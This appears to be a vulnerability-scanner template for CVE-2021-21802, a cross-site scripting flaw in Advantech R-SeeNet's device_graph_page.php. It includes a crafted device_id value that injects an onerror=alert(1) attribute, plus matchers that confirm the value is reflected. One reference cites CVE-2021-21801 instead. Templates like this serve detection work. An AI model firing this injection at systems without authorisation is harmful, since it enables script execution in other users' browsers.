id: CVE-2021-21802

info:

name: Advantech R-SeeNet - Cross-Site Scripting

author: gy741

severity: medium

description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.

reference:

- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272

- https://nvd.nist.gov/vuln/detail/CVE-2021-21801

classification:

cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

cvss-score: 6.1

cve-id: CVE-2021-21802

cwe-id: CWE-79

tags: cve,cve2021,rseenet,xss

requests:

- method: GET

path:

- '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22'

matchers-condition: and

matchers:

- type: word

words:

- '"zlo onerror=alert(1) "'

- 'Device Status Graph'

part: body

condition: and

- type: word

part: header

words:

- text/html

- type: status

status:

- 200

# Enhanced by mp on 2022/09/02